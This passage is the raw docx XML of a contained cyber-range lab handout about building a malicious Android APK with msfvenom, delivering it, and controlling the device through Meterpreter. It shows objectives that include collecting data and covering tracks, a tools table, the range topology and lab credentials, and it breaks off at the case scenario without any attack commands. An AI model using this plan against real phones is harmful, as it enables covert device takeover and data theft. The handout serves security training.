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B71EB8" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000" w:rsidP="00E35155">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>TINY CYBERLAB (TCL) · RANGE LAB SERIES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E222D37" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000" w:rsidP="00E35155">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="243027"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>TCL 25 — How to Compromise an Android Device with a Malicious APK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002D95EA" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000" w:rsidP="00E35155">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Cipher Logistics Security Assessment Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5053EA8F" w14:textId="77777777" w:rsidR="00E35155" w:rsidRDefault="00E35155" w:rsidP="00E35155">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A90E7C1" w14:textId="77777777" w:rsidR="00E35155" w:rsidRDefault="00E35155" w:rsidP="00E35155">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E1AC61" w14:textId="77777777" w:rsidR="00E35155" w:rsidRDefault="00E35155" w:rsidP="00E35155">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FDCD9F1" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1. Introduction &amp; Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A1EBA4" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>This lab is part of the Tiny CyberLab range curriculum in which you act as a junior security analyst at Summit Cyber Group, engaged by Cipher Logistics to run a pre-audit security assessment. The engagement runs on Tiny CyberLab (TCL), the course's Docker-based cyber range. Lab 25 focuses on: building a malicious Android payload, delivering it, and controlling the device with Meterpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD9A276" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A3EF8" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Build a malicious Android APK payload with msfvenom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E691E" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Host and deliver the APK, and catch the session with a multi/handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07636025" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Interact with the compromised Android device via Meterpreter (enumerate, collect, cover tracks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6C206B" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Explain the mobile defenses that would have blocked the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71246C74" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>Tools used in this lab (3, CEH exam-relevant):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4770"/>
        <w:gridCol w:w="4770"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA5F09" w14:paraId="027DCCCF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="1D619834" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="4418B252" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Role in this lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F09" w14:paraId="0EB3AC85" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F26CC96" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>msfvenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E83507C" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Android APK payload generation — CEH “Mobile Platform Hacking” domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F09" w14:paraId="6C73D984" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DEE2D61" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>msfconsole / multi-handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="554FAB84" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Catching and managing the Android session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F09" w14:paraId="0EBEFA7B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="336C92BE" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Meterpreter (android)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4770" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67464B2D" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Post-exploitation on the mobile device</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F9C0132" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2. NIST/NICE Role Alignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE6C411" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>This lab is mapped to the following NICE Workforce Framework for Cybersecurity (NIST SP 800-181 Rev. 1) work role(s):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3180"/>
        <w:gridCol w:w="3180"/>
        <w:gridCol w:w="3180"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA5F09" w14:paraId="2A6A94AF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="65FC7F0A" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Work role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="22A28BAF" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="50D58560" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>How this lab fulfills it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F09" w14:paraId="4324DF6B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55D6CB20" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Vulnerability Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C3B6464" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PD-WRL-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D871B07" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mobile endpoints carry the same sensitive access as laptops; demonstrating a malicious-app compromise is how this role argues for mobile-device controls.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="789BD9B8" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. Network Topology, Hostnames, IPs &amp; Credentials</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1908"/>
        <w:gridCol w:w="1908"/>
        <w:gridCol w:w="1908"/>
        <w:gridCol w:w="1908"/>
        <w:gridCol w:w="1908"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA5F09" w14:paraId="10463E4F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="0DFC5D7C" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="259B1845" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="49FEC7B6" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="4E40773E" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>OS / Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E3E9E3"/>
          </w:tcPr>
          <w:p w14:paraId="1A2B7578" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="4A564D"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA5F09" w14:paraId="660FB171" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71D11BA3" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E1E2C3B" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attacker workstation (Kali + XFCE/RDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6693C28D" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>10.10.0.10 (internet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D9B8373" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1908" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="620E9FA7" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>root / cyberrange</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03172BD9" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55FF5235" wp14:editId="3F019804">
            <wp:extent cx="5760720" cy="3210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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3210301"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF9D79C" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="4A564D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 1 — Tiny CyberLab (TCL) topology (all labs share this environment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD142DB" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="4A564D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Note: CyberLab is a segmented range on one Docker host — an INTERNET segment (10.10.0.0/24) with the attacker and a firewall router, a DMZ (10.20.0.0/24) with the web apps and DNS, and an internal LAN (10.30.0.0/24) with the vulnerable host. Work from the attacker (10.10.0.10): for the GUI labs open its desktop over RDP at 127.0.0.1:3389 (user root, password cyberrange); for a terminal run  docker exec -it attacker bash . From the attacker the router permits the DMZ on ports 80, 3000, 53 and ICMP only, so the web apps (juiceshop 10.20.0.11:3000, dvwa 10.20.0.12:80) and DNS (10.20.0.53) are directly reachable. The LAN host (metasploitable 10.30.0.20) is reachable only by PIVOTING through the dual-homed dvwa (10.20.0.12 / 10.30.0.12) — treat that as the bonus objective. Confirm live values with  docker ps  and  docker network inspect br-dmz . Nothing is published outside the host, so all testing is contained.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA5F09" w14:paraId="0E42392F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEE7F1"/>
          </w:tcPr>
          <w:p w14:paraId="6FFEAB77" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="243027"/>
              </w:rPr>
              <w:t>Reaching the target in this lab</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1804E141" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="243027"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>The range has no Android target, so this lab is delivered as a build-and-analyze exercise: craft the APK and a listener on the attacker and analyze the payload. If your section has an Android emulator/VM, place it on the LAN and reach it via the dvwa pivot; otherwise complete the static/handler portions only.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D9866E4" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. Learning Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAFEFBF" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>By the end of this lab, you will be able to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8D780F" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Build a malicious Android APK payload with msfvenom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3043B316" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Host and deliver the APK, and catch the session with a multi/handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303A3274" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Interact with the compromised Android device via Meterpreter (enumerate, collect, cover tracks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE4F5A" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="243027"/>
        </w:rPr>
        <w:t>• Explain the mobile defenses that would have blocked the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112706EA" w14:textId="77777777" w:rsidR="00EA5F09" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F6156"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>5. Case Scenario</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9540"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EA5F09" w14:paraId="47A33F1C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE9E4"/>
